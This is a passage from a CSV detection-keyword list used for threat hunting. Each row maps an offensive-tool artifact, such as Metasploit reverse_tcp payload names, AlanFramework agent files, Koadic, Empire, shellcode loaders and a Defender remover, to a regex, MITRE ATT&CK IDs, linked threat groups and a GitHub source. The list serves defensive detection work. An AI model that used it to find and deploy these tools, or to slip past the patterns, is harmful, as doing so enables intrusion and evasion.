Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","62728" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","62729" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62730" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","62731" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62732" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62733" "*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62734" "*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62735" "*windows\samdump.go*",".{0,1000}windows\\samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","62736" "*windows_agent/asm/x64/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x64\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62738" "*windows_agent/asm/x86/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x86\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62739" "*windows_agent/dll_main.*",".{0,1000}windows_agent\/dll_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62740" "*windows_agent/exe_main.*",".{0,1000}windows_agent\/exe_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62741" "*windows_agent/win_*.c*",".{0,1000}windows_agent\/win_.{0,1000}\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62742" "*windows_agent/win_named_pipe.*",".{0,1000}windows_agent\/win_named_pipe\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62743" "*windows_agent/win_shell.*",".{0,1000}windows_agent\/win_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62744" "*windows_autologin.md*",".{0,1000}windows_autologin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62745" "*windows_console_interceptor*dll_main.c*",".{0,1000}windows_console_interceptor.{0,1000}dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62746" "*windows_console_interceptor*exe_main.c*",".{0,1000}windows_console_interceptor.{0,1000}exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62747" 
"*windows_console_interceptor*interceptor.*",".{0,1000}windows_console_interceptor.{0,1000}interceptor\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","62748" "*windows_credentials.py*",".{0,1000}windows_credentials\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","62749" "*windows_downdate.exe*",".{0,1000}windows_downdate\.exe.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62750" "*windows_key.py*",".{0,1000}windows_key\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62751" "*windows_recon.bat*",".{0,1000}windows_recon\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62752" "*windows_sam_hivenightmare.md*",".{0,1000}windows_sam_hivenightmare\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62753" "*windows_sam_hivenightmare.rb*",".{0,1000}windows_sam_hivenightmare\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62754" "*Windows_Trojan_Metasploit*",".{0,1000}Windows_Trojan_Metasploit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62755" "*windows10_ntfs_crash_dos*",".{0,1000}windows10_ntfs_crash_dos.{0,1000}","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. 
It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","N/A","7","600","131","2024-05-04T20:18:36Z","2018-04-27T19:31:59Z","62756" "*Windows7-BypassLogon-Screen.ino*",".{0,1000}Windows7\-BypassLogon\-Screen\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62757" "*WindowsDefenderEventLog_Enum *",".{0,1000}WindowsDefenderEventLog_Enum\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","62758" "*windows-defender-remover-main.zip*",".{0,1000}windows\-defender\-remover\-main\.zip.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","62759" "*Windows-Downdate must be run as an Administrator*",".{0,1000}Windows\-Downdate\smust\sbe\srun\sas\san\sAdministrator.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - 
TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62760" "*WindowsEnum -*",".{0,1000}WindowsEnum\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-WinEnum.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62761" "*WindowsExploits*",".{0,1000}WindowsExploits.{0,1000}","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","N/A","10","1275","534","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z","62762" "*windows-exploit-suggester.*",".{0,1000}windows\-exploit\-suggester\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","62763" "*windows-forkbomb.ino*",".{0,1000}windows\-forkbomb\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62764" "*WindowsLies*BlockWindows*",".{0,1000}WindowsLies.{0,1000}BlockWindows.{0,1000}","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","N/A","7","641","96","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z","62765" "*Windows-Post-Exploitation*",".{0,1000}Windows\-Post\-Exploitation.{0,1000}","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. 
could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","N/A","6","533","117","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z","62766" "*windows-privesc-check*",".{0,1000}windows\-privesc\-check.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62767" "*Windows-Privilege-Escalation*",".{0,1000}Windows\-Privilege\-Escalation.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62768" "*WindowsShareFinder.cs*",".{0,1000}WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","62769" "*windows-subbrute.zip*",".{0,1000}windows\-subbrute\.zip.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","62771" "*window-state@safejka.eu*",".{0,1000}window\-state\@safejka\.eu.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","62772" "*WINEDEBUG=-all wine XiebroC2MAc*",".{0,1000}WINEDEBUG\=\-all\swine\sXiebroC2MAc.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","62773" "*winexec.notepad.raw*",".{0,1000}winexec\.notepad\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","62774" 
"*winexesvc32.exe*",".{0,1000}winexesvc32\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","62775" "*winexesvc64.exe*",".{0,1000}winexesvc64\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","62776" "*WinhttpShellcode.cpp*",".{0,1000}WinhttpShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62778" "*WinhttpShellcode.exe*",".{0,1000}WinhttpShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62779" "*WinhttpShellcode.sln*",".{0,1000}WinhttpShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - 
